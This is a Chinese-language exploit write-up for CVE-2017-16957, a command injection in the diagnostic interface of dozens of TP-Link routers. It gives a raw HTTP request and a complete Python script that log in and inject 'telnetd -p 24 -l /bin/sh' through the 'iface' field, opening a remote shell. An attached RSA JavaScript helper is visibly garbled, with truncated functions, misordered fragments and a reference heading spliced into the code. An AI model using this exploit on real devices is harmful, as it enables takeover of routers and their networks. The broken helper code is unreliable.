# (CVE-2017-16957)TP-Link 命令注入漏洞
TP-Link TL-WVR等都是中国普联(TP-LINK)公司的无线路由器产品。
多款TP-Link产品中存在命令注入漏洞。远程攻击者可通过向cgi-bin/luci发送face字段中带有shell元字符的admin/diagnostic命令利用该漏洞执行任意命令。
## 二、漏洞影响
TP-LINK TL-WVR TP-LINK TL-WVR300 v4 TP-LINK TL-WVR302 v2 TP-LINK TL-WVR450 TP-LINK TL-WVR450L TP-LINK TL-WVR450G v5 TP-LINK TL-WVR458 TP-LINK TL-WVR458L TP-LINK TL-WVR458P TP-LINK TL-WVR900G v3 TP-LINK TL-WVR1200L TP-LINK TL-WVR900L TP-LINK TL-WVR1300L TP-LINK TL-WVR1300G TP-LINK TL-WVR1750L TP-LINK TL-WVR2600L TP-LINK TL-WVR4300L TP-LINK TL-WAR450 TP-LINK TL-WAR302 TP-LINK TL-WAR2600L TP-LINK TL-WAR1750L TP-LINK TL-WAR1300L TP-LINK TL-WAR1200L TP-LINK TL-WAR900L TP-LINK TL-WAR458 TP-LINK TL-WAR450L TP-LINK TL-ER5510G v2 TP-LINK TL-ER5510G v3 TP-LINK TL-ER5520G v2 TP-LINK TL-ER5520G v3 TP-LINK TL-ER6120G v2 TP-LINK TL-ER6520G v2 TP-LINK TL-ER6520G v3 TP-LINK TL-ER3210G TP-LINK TL-ER7520G TP-LINK TL-ER6520G TP-LINK TL-ER6510G TP-LINK TL-ER6220G TP-LINK TL-ER6120G TP-LINK TL-ER6110G TP-LINK TL-ER5120G TP-LINK TL-ER5110G TP-LINK TL-ER3220G TP-LINK TL-R479P-AC TP-LINK TL-R478G+ TP-LINK TL-R478G TP-LINK TL-R478+ TP-LINK TL-R478 TP-LINK TL-R473GP-AC TP-LINK TL-R473P-AC TP-LINK TL-R473G TP-LINK TL-R473 TP-LINK TL-R4299G TP-LINK TL-R4239G TP-LINK TL-R4149G TP-LINK TL-R488 TP-LINK TL-R483 TP-LINK TL-R483G TP-LINK TL-R479GP-AC TP-LINK TL-R479GPE-AC
## 三、复现过程
“`
POST /cgi-bin/luci/;stok=ea2178b4514da7ae227f4ec192536930/admin/diagnostic?form=diag HTTP/1.1
Host: 0-sec.org
Content-Length: 370
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://192.168.3.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.3.1/webpages/index.html
Accept-Encoding: gzip, deflate
Cookie: sysauth=be9b6f2b4b9a76a8a658e108c6197f2c
Connection: close
data=%7B%22method%22%3A%22start%22%2C%22params%22%3A%7B%22type%22%3A%220%22%2C%22type_hidden%22%3A%220%22%2C%22ipaddr_ping%22%3A%22baidu.com%22%2C%22iface_ping%22%3A%22WAN1%22%2C%22ipaddr%22%3A%22baidu.com%22%2C%22iface%22%3A%22%3Btelnetd+-p+24+-l+/bin/sh%22%2C%22count%22%3A%221%22%2C%22pktsize%22%3A%2264%22%2C%22my_result%22%3A%22The+Router+is+ready.%5Cr%5Cn%22%7D%7D
“`
### 漏洞脚本
“`python
# Tested product: TL-WVR450L
# Hardware version:V1.0
# Firmware version: 20161125
# The RSA_Encryption_For_Tplink.js is use for Rsa Encryption to the password when login the web manager.
# You can download the RSA_Encryption_For_Tplink.js by https://github.com/coincoin7/Wireless-Router-Vulnerability/blob/master/RSA_Encryption_For_Tplink.js
import execjs
import requests
import json
import urllib
def read_js():
file = open(“./RSA_Encryption_For_Tplink.js”, ‘r’)
line = file.readline()
js = ”
while line:
js = js + line
line = file.readline()
file.close()
return js
def execute(ip, port, username, passwd, cmd):
try:
s = requests.session()
uri = “http://{}:{}”.format(ip,port)
headers = {
‘Content-Type’:’application/x-www-form-urlencoded; charset=UTF-8′,
‘Referer’: ‘http://{}/webpages/login.html’.format(ip)
}
payload = {
“method”:”get”
}
ret = s.post(uri + ‘/cgi-bin/luci/;stok=/login?form=login’, data=urllib.urlencode({“data”:json.dumps(payload)}), headers=headers, timeout=5)
rsa_public_n = json.loads(ret.text)[‘result’][‘password’][0].encode(“utf-8”)
rsa_public_e = json.loads(ret.text)[‘result’][‘password’][1].encode(“utf-8”)
js = read_js()
js_handle = execjs.compile(js)
password = js_handle.call(‘MainEncrypt’, rsa_public_n, rsa_public_e, passwd)
payload = {
“method”:”login”,
“params”:{
“username”:”{}”.format(username),
“password”:”{}”.format(password)
}
}
ret = s.post(uri + ‘/cgi-bin/luci/;stok=/login?form=login’, data=urllib.urlencode({“data”:json.dumps(payload)}), headers=headers, timeout=5)
stok = json.loads(ret.text)[‘result’][‘stok’].encode(‘utf-8’)
cookie = ret.headers[‘Set-Cookie’]
print ‘[+] Login success’
print ‘[+] Get The Token: ‘ + stok
print ‘[+] Get The Cookie: ‘ + cookie
headers = {
‘Content-Type’:’application/x-www-form-urlencoded; charset=UTF-8′,
‘Referer’:’http://{}/webpages/login.html’.format(ip),
‘Cookie’:'{}’.format(cookie)
}
payload = {
“method”:”start”,
“params”:{
“type”:”0″,
“type_hidden”:”0″,
“ipaddr_ping”:”127.0.0.1″,
“iface_ping”:”WAN1″,
“ipaddr”:”127.0.0.1″,
“iface”:”;{}”.format(cmd),
“count”:”1″,
“pktsize”:”64″,
“my_result”:”exploit”
}
}
ret = s.post(uri + ‘/cgi-bin/luci/;stok={}/admin/diagnostic?form=diag’.format(stok), data=urllib.urlencode({“data”:json.dumps(payload)}), headers=headers, timeout=5)
#print ret.text
print ‘[+] Finish RCE’
print ‘————————————————————–‘
return True
except:
return False
if __name__==’__main__’:
print ‘———–Tplink LUCI diagnostic Authenticated RCE———–‘
print execute(‘192.168.1.1’, 80, ‘admin’, ‘admin’, ‘telnetd -p 24 -l /bin/sh’)
“`
### RSA_Encryption_For_Tplink.js 文件
“`js
// Copyright (c) 2005 Tom Wu
// All Rights Reserved.
// See “LICENSE” for details.
// Basic JavaScript BN library – subset useful for RSA encryption.
// Bits per digit
// JavaScript engine analysis
var BI_RC = new Array();
var BI_RM = “0123456789abcdefghijklmnopqrstuvwxyz”;
var dbits;
var canary = 0xdeadbeefcafe;
var j_lm = ((canary&0xffffff)==0xefcafe);
var rng_psize = 256;
var rng_state;
var rng_pool;
var rng_pptr;
// Initialize the pool with junk if needed.
BigInteger.prototype.am = am2;
dbits = 30;
BigInteger.prototype.DB = dbits;
BigInteger.prototype.DM = ((1<
var v = x*this[i++]+w[j]+c;
c = Math.floor(v/0x4000000);
w[j++] = v&0x3ffffff;
}
return c;
}
// am2 avoids a big mult-and-extract completely.
// Max digit bits should be <= 30 because we do bitwise ops
// on values up to 2*hdvalue^2-hdvalue-1 (< 2^31)
function am2(i,x,w,j,c,n) {
var xl = x&0x7fff, xh = x>>15;
while(–n >= 0) {
var l = this[i]&0x7fff;
var h = this[i++]>>15;
var m = xh*l+h*xl;
l = xl*l+((m&0x7fff)<<15)+w[j]+(c&0x3fffffff);
c = (l>>>30)+(m>>>15)+xh*h+(c>>>30);
w[j++] = l&0x3fffffff;
}
return c;
}
// Alternately, set max digit bits to 28 since some
// browsers slow down when dealing with 32-bit numbers.
function am3(i,x,w,j,c,n) {
var xl = x&0x3fff, xh = x>>14;
while(–n >= 0) {
var l = this[i]&0x3fff;
var h = this[i++]>>14;
var m = xh*l+h*xl;
l = xl*l+((m&0x3fff)<<14)+w[j]+c;
c = (l>>28)+(m>>14)+xh*h;
w[j++] = l&0xfffffff;
}
return c;
}
function int2char(n) { return BI_RM.charAt(n); }
function intAt(s,i) {
var c = BI_RC[s.charCodeAt(i)];
return (c==null)?-1:c;
}
// (protected) copy this to r
function bnpCopyTo(r) {
for(var i = this.t-1; i >= 0; –i) r[i] = this[i];
r.t = this.t;
r.s = this.s;
}
// (protected) set from integer value x, -DV <= x < DV
function bnpFromInt(x) {
this.t = 1;
this.s = (x<0)?-1:0;
if(x > 0) this[0] = x;
else if(x < -1) this[0] = x+this.DV;
else this.t = 0;
} // return bigint initialized to value
function nbv(i) { var r = nbi(); r.fromInt(i); return r; } // (protected) set from string and radix
function bnpFromString(s,b) {
var k;
if(b == 16) k = 4;
else if(b == 8) k = 3;
else if(b == 256) k = 8; // byte array
else if(b == 2) k = 1;
else if(b == 32) k = 5;
else if(b == 4) k = 2;
else { this.fromRadix(s,b); return; }
this.t = 0;
this.s = 0;
var i = s.length, mi = false, sh = 0;
while(--i >= 0) {
var x = (k==8)?s[i]&0xff:intAt(s,i);
if(x < 0) {
if(s.charAt(i) == "-") mi = true;
continue;
}
mi = false;
if(sh == 0)
this[this.t++] = x;
else if(sh+k > this.DB) {
this[this.t-1] |= (x&((1<<(this.DB-sh))-1))<
}
else
this[this.t-1] |= x<
}
if(k == 8 && (s[0]&0x80) != 0) {
this.s = -1;
if(sh > 0) this[this.t-1] |= ((1<<(this.DB-sh))-1)<
}
// (public) return string representation in given radix >(p+=this.DB-k); // (public) -this // (public) |this| // returns bit length of the integer x // (public) return the number of bits in “this” // (protected) r = this >> n*DB // (protected) r = this >> n // (protected) r = this * a, r != this,a (HAC 14.12) // (protected) divide this by m, quotient and remainder to q, r (HAC 14.20) // Modular reduction using “classic” algorithm // (protected) return “-1/this % 2^DB”; useful for Mont. reduction // Montgomery reduction // x/R mod m // x = x/R mod m (HAC 14.32) // r = “x^2/R mod m”; x != r // r = “xy/R mod m”; x,y != r // (protected) true iff this is even // (protected) this^e, e < 2^32, doing sqr and mul with "r" (HAC 14.79)
function bnpExp(e,z) {
if(e > 0xffffffff || e < 1) return BigInteger.ONE;
var r = nbi(), r2 = nbi(), g = z.convert(this), i = nbits(e)-1;
g.copyTo(r);
while(--i >= 0) { // (public) this^e % m, 0 <= e < 2^32
function bnModPowInt(e,m) {
var z;
if(e < 256 || m.isEven()) z = new Classic(m); else z = new Montgomery(m);
return this.exp(e,z);
} // prng4.js - uses Arcfour as a PRNG function Arcfour() {
this.i = 0;
this.j = 0;
this.S = new Array();
} // Initialize arcfour context from key, an array of ints, each from [0..255]
function ARC4init(key) {
var i, j, t;
for(i = 0; i < 256; ++i)
this.S[i] = i;
j = 0;
for(i = 0; i < 256; ++i) {
j = (j + this.S[i] + key[i % key.length]) & 255;
t = this.S[i];
this.S[i] = this.S[j];
this.S[j] = t;
}
this.i = 0;
this.j = 0;
} function ARC4next() {
var t;
this.i = (this.i + 1) & 255;
this.j = (this.j + this.S[this.i]) & 255;
t = this.S[this.i];
this.S[this.i] = this.S[this.j];
this.S[this.j] = t;
return this.S[(t + this.S[this.i]) & 255];
} // Plug in your RNG constructor here
function prng_newstate() {
return new Arcfour();
} // Mix in a 32-bit integer into the pool
function rng_seed_int(x) {
rng_pool[rng_pptr++] ^= x & 255;
rng_pool[rng_pptr++] ^= (x >> 8) & 255; // Mix in the current time (w/milliseconds) into the pool function rng_get_byte() { function nopadding(s,n) { // Perform raw public operation on “x”: return x^e (mod n) // Return the PKCS#1 RSA encryption of “text” as an even-length hex string function MainEncrypt(n,e,message) { var rsa = new RSAKey(); rsa.setPublic(n,e); ## 四、参考链接 > https://www.03sec.com/3207.shtml
function bnToString(b) {
if(this.s < 0) return "-"+this.negate().toString(b);
var k;
if(b == 16) k = 4;
else if(b == 8) k = 3;
else if(b == 2) k = 1;
else if(b == 32) k = 5;
else if(b == 4) k = 2;
else return this.toRadix(b);
var km = (1<
if(p < this.DB && (d = this[i]>>p) > 0) { m = true; r = int2char(d); }
while(i >= 0) {
if(p < k) {
d = (this[i]&((1<
}
else {
d = (this[i]>>(p-=k))&km;
if(p <= 0) { p += this.DB; --i; }
}
if(d > 0) m = true;
if(m) r += int2char(d);
}
}
return m?r:”0″;
}
function bnNegate() { var r = nbi(); BigInteger.ZERO.subTo(this,r); return r; }
function bnAbs() { return (this.s<0)?this.negate():this; } // (public) return + if this > a, – if this < a, 0 if equal
function bnCompareTo(a) {
var r = this.s-a.s;
if(r != 0) return r;
var i = this.t;
r = i-a.t;
if(r != 0) return (this.s<0)?-r:r;
while(--i >= 0) if((r=this[i]-a[i]) != 0) return r;
return 0;
}
function nbits(x) {
var r = 1, t;
if((t=x>>>16) != 0) { x = t; r += 16; }
if((t=x>>8) != 0) { x = t; r += 8; }
if((t=x>>4) != 0) { x = t; r += 4; }
if((t=x>>2) != 0) { x = t; r += 2; }
if((t=x>>1) != 0) { x = t; r += 1; }
return r;
}
function bnBitLength() {
if(this.t <= 0) return 0;
return this.DB*(this.t-1)+nbits(this[this.t-1]^(this.s&this.DM));
} // (protected) r = this << n*DB
function bnpDLShiftTo(n,r) {
var i;
for(i = this.t-1; i >= 0; –i) r[i+n] = this[i];
for(i = n-1; i >= 0; –i) r[i] = 0;
r.t = this.t+n;
r.s = this.s;
}
function bnpDRShiftTo(n,r) {
for(var i = n; i < this.t; ++i) r[i-n] = this[i];
r.t = Math.max(this.t-n,0);
r.s = this.s;
} // (protected) r = this << n
function bnpLShiftTo(n,r) {
var bs = n%this.DB;
var cbs = this.DB-bs;
var bm = (1<
r[i+ds+1] = (this[i]>>cbs)|c;
c = (this[i]&bm)<
r[ds] = c;
r.t = this.t+ds+1;
r.s = this.s;
r.clamp();
}
function bnpRShiftTo(n,r) {
r.s = this.s;
var ds = Math.floor(n/this.DB);
if(ds >= this.t) { r.t = 0; return; }
var bs = n%this.DB;
var cbs = this.DB-bs;
var bm = (1<
for(var i = ds+1; i < this.t; ++i) {
r[i-ds-1] |= (this[i]&bm)<
}
if(bs > 0) r[this.t-ds-1] |= (this.s&bm)<
}
if(a.t < this.t) {
c -= a.s;
while(i < this.t) {
c += this[i];
r[i++] = c&this.DM;
c >>= this.DB;
}
c += this.s;
}
else {
c += this.s;
while(i < a.t) {
c -= a[i];
r[i++] = c&this.DM;
c >>= this.DB;
}
c -= a.s;
}
r.s = (c<0)?-1:0;
if(c < -1) r[i++] = this.DV+c;
else if(c > 0) r[i++] = c;
r.t = i;
r.clamp();
}
// “this” should be the larger one if appropriate.
function bnpMultiplyTo(a,r) {
var x = this.abs(), y = a.abs();
var i = x.t;
r.t = i+y.t;
while(–i >= 0) r[i] = 0;
for(i = 0; i < y.t; ++i) r[i+x.t] = x.am(0,y[i],r,i,0,x.t);
r.s = 0;
r.clamp();
if(this.s != a.s) BigInteger.ZERO.subTo(r,r);
} // (protected) r = this^2, r != this (HAC 14.16)
function bnpSquareTo(r) {
var x = this.abs();
var i = r.t = 2*x.t;
while(--i >= 0) r[i] = 0;
for(i = 0; i < x.t-1; ++i) {
var c = x.am(i,x[i],r,2*i,0,1);
if((r[i+x.t]+=x.am(i+1,2*x[i],r,2*i+1,c,x.t-i-1)) >= x.DV) {
r[i+x.t] -= x.DV;
r[i+x.t+1] = 1;
}
}
if(r.t > 0) r[r.t-1] += x.am(i,x[i],r,2*i,0,1);
r.s = 0;
r.clamp();
}
// r != q, this != m. q or r may be null.
function bnpDivRemTo(m,q,r) {
var pm = m.abs();
if(pm.t <= 0) return;
var pt = this.abs();
if(pt.t < pm.t) {
if(q != null) q.fromInt(0);
if(r != null) this.copyTo(r);
return;
}
if(r == null) r = nbi();
var y = nbi(), ts = this.s, ms = m.s;
var nsh = this.DB-nbits(pm[pm.t-1]); // normalize modulus
if(nsh > 0) { pm.lShiftTo(nsh,y); pt.lShiftTo(nsh,r); }
else { pm.copyTo(y); pt.copyTo(r); }
var ys = y.t;
var y0 = y[ys-1];
if(y0 == 0) return;
var yt = y0*(1<
var d1 = this.FV/yt, d2 = (1<
r[r.t++] = 1;
r.subTo(t,r);
}
BigInteger.ONE.dlShiftTo(ys,t);
t.subTo(y,y); // “negative” y so we can replace sub with am later
while(y.t < ys) y[y.t++] = 0;
while(--j >= 0) {
// Estimate quotient digit
var qd = (r[–i]==y0)?this.DM:Math.floor(r[i]*d1+(r[i-1]+e)*d2);
if((r[i]+=y.am(0,qd,r,j,0,ys)) < qd) { // Try it out
y.dlShiftTo(j,t);
r.subTo(t,r);
while(r[i] < --qd) r.subTo(t,r);
}
}
if(q != null) {
r.drShiftTo(ys,q);
if(ts != ms) BigInteger.ZERO.subTo(q,q);
}
r.t = ys;
r.clamp();
if(nsh > 0) r.rShiftTo(nsh,r); // Denormalize remainder
if(ts < 0) BigInteger.ZERO.subTo(r,r);
} // (public) this mod a
function bnMod(a) {
var r = nbi();
this.abs().divRemTo(a,null,r);
if(this.s < 0 && r.compareTo(BigInteger.ZERO) > 0) a.subTo(r,r);
return r;
}
function Classic(m) { this.m = m; }
function cConvert(x) {
if(x.s < 0 || x.compareTo(this.m) >= 0) return x.mod(this.m);
else return x;
}
function cRevert(x) { return x; }
function cReduce(x) { x.divRemTo(this.m,null,x); }
function cMulTo(x,y,r) { x.multiplyTo(y,r); this.reduce(r); }
function cSqrTo(x,r) { x.squareTo(r); this.reduce(r); }
// justification:
// xy == 1 (mod m)
// xy = 1+km
// xy(2-xy) = (1+km)(1-km)
// x[y(2-xy)] = 1-k^2m^2
// x[y(2-xy)] == 1 (mod m^2)
// if y is 1/x mod m, then y(2-xy) is 1/x mod m^2
// should reduce x and y(2-xy) by m^2 at each step to keep size bounded.
// JS multiply “overflows” differently from C/C++, so care is needed here.
function bnpInvDigit() {
if(this.t < 1) return 0;
var x = this[0];
if((x&1) == 0) return 0;
var y = x&3; // y == 1/x mod 2^2
y = (y*(2-(x&0xf)*y))&0xf; // y == 1/x mod 2^4
y = (y*(2-(x&0xff)*y))&0xff; // y == 1/x mod 2^8
y = (y*(2-(((x&0xffff)*y)&0xffff)))&0xffff; // y == 1/x mod 2^16
// last step - calculate inverse mod DV directly;
// assumes 16 < DB <= 32 and assumes ability to handle 48-bit ints
y = (y*(2-x*y%this.DV))%this.DV; // y == 1/x mod 2^dbits
// we really want the negative inverse, and -DV < y < DV
return (y>0)?this.DV-y:-y;
}
function Montgomery(m) {
this.m = m;
this.mp = m.invDigit();
this.mpl = this.mp&0x7fff;
this.mph = this.mp>>15;
this.um = (1<<(m.DB-15))-1;
this.mt2 = 2*m.t;
} // xR mod m
function montConvert(x) {
var r = nbi();
x.abs().dlShiftTo(this.m.t,r);
r.divRemTo(this.m,null,r);
if(x.s < 0 && r.compareTo(BigInteger.ZERO) > 0) this.m.subTo(r,r);
return r;
}
function montRevert(x) {
var r = nbi();
x.copyTo(r);
this.reduce(r);
return r;
}
function montReduce(x) {
while(x.t <= this.mt2) // pad x so am has enough room later
x[x.t++] = 0;
for(var i = 0; i < this.m.t; ++i) {
// faster way of calculating u0 = x[i]*mp mod DV
var j = x[i]&0x7fff;
var u0 = (j*this.mpl+(((j*this.mph+(x[i]>>15)*this.mpl)&this.um)<<15))&x.DM;
// use am to combine the multiply-shift-add into one call
j = i+this.m.t;
x[j] += this.m.am(0,u0,x,i,0,this.m.t);
// propagate carry
while(x[j] >= x.DV) { x[j] -= x.DV; x[++j]++; }
}
x.clamp();
x.drShiftTo(this.m.t,x);
if(x.compareTo(this.m) >= 0) x.subTo(this.m,x);
}
function montSqrTo(x,r) { x.squareTo(r); this.reduce(r); }
function montMulTo(x,y,r) { x.multiplyTo(y,r); this.reduce(r); }
function bnpIsEven() { return ((this.t>0)?(this[0]&1):this.s) == 0; }
z.sqrTo(r,r2);
if((e&(1< 0) z.mulTo(r2,g,r);
else { var t = r; r = r2; r2 = t; }
}
return z.revert(r);
}
rng_pool[rng_pptr++] ^= (x >> 16) & 255;
rng_pool[rng_pptr++] ^= (x >> 24) & 255;
if(rng_pptr >= rng_psize) rng_pptr -= rng_psize;
}
function rng_seed_time() {
rng_seed_int(new Date().getTime());
}
if(rng_state == null) {
rng_seed_time();
rng_state = prng_newstate();
rng_state.init(rng_pool);
for(rng_pptr = 0; rng_pptr < rng_pool.length; ++rng_pptr)
rng_pool[rng_pptr] = 0;
rng_pptr = 0;
//rng_pool = null;
}
// TODO: allow reseeding after first request
return rng_state.next();
} function rng_get_bytes(ba) {
var i;
for(i = 0; i < ba.length; ++i) ba[i] = rng_get_byte();
} function SecureRandom() {} // Depends on jsbn.js and rng.js // Version 1.1: support utf-8 encoding in pkcs1pad2 // convert a (hex) string to a bignum object
function parseBigInt(str,r) {
return new BigInteger(str,r);
} function linebrk(s,n) {
var ret = "";
var i = 0;
while(i + n < s.length) {
ret += s.substring(i,i+n) + "\n";
i += n;
}
return ret + s.substring(i,s.length);
} function byte2Hex(b) {
if(b < 0x10)
return "0" + b.toString(16);
else
return b.toString(16);
} // PKCS#1 (type 2, random) pad input string s to n bytes, and return a bigint
function pkcs1pad2(s,n) {
if(n < s.length + 11) { // TODO: fix for utf-8
alert("Message too long for RSA");
return null;
}
var ba = new Array();
var i = s.length - 1;
while(i >= 0 && n > 0) {
var c = s.charCodeAt(i–);
if(c < 128) { // encode using utf-8
ba[--n] = c;
}
else if((c > 127) && (c < 2048)) {
ba[--n] = (c & 63) | 128;
ba[--n] = (c >> 6) | 192;
}
else {
ba[–n] = (c & 63) | 128;
ba[–n] = ((c >> 6) & 63) | 128;
ba[–n] = (c >> 12) | 224;
}
}
ba[–n] = 0;
var rng = new SecureRandom();
var x = new Array();
while(n > 2) { // random non-zero pad
x[0] = 0;
while(x[0] == 0) rng.nextBytes(x);
ba[–n] = x[0];
}
ba[–n] = 2;
ba[–n] = 0;
return new BigInteger(ba);
}
if(n < s.length) { // TODO: fix for utf-8
alert("Message too long for RSA");
return null;
};
//console.log(s, n)
var ba = new Array();
var i = 0;
var j = 0;
while(i < s.length && j < n) {
var c = s.charCodeAt(i++);
if(c < 128) { // encode using utf-8
ba[j++] = c;
}else if((c > 127) && (c < 2048)){
ba[j++] = (c & 63) | 128;
ba[j++] = (c >> 6) | 192;
}else{
ba[j++] = (c & 63) | 128;
ba[j++] = ((c >> 6) & 63) | 128;
ba[j++] = (c >> 12) | 224;
}
};
while (j < n) {
ba[j++] = 0;
};
//console.log(ba)
return new BigInteger(ba);
} // "empty" RSA key constructor
function RSAKey() {
this.n = null;
this.e = 0;
this.d = null;
this.p = null;
this.q = null;
this.dmp1 = null;
this.dmq1 = null;
this.coeff = null;
} // Set the public key fields N and e from hex strings
function RSASetPublic(N,E) {
if(N != null && E != null && N.length > 0 && E.length > 0) {
this.n = parseBigInt(N,16);
this.e = parseInt(E,16);
}
else
alert(“Invalid RSA public key”);
}
function RSADoPublic(x) {
return x.modPowInt(this.e, this.n);
}
function RSAEncrypt(text) {
var m = nopadding(text,(this.n.bitLength()+7)>>3);
if(m == null) return null;
var c = this.doPublic(m);
if(c == null) return null;
var h = c.toString(16);
if((h.length & 1) == 0) return h; else return “0” + h;
}
RSAKey.prototype.doPublic = RSADoPublic;
RSAKey.prototype.setPublic = RSASetPublic;
RSAKey.prototype.encrypt = RSAEncrypt;
var passwd = rsa.encrypt(message);
return passwd;
}
“`
请登录后查看评论内容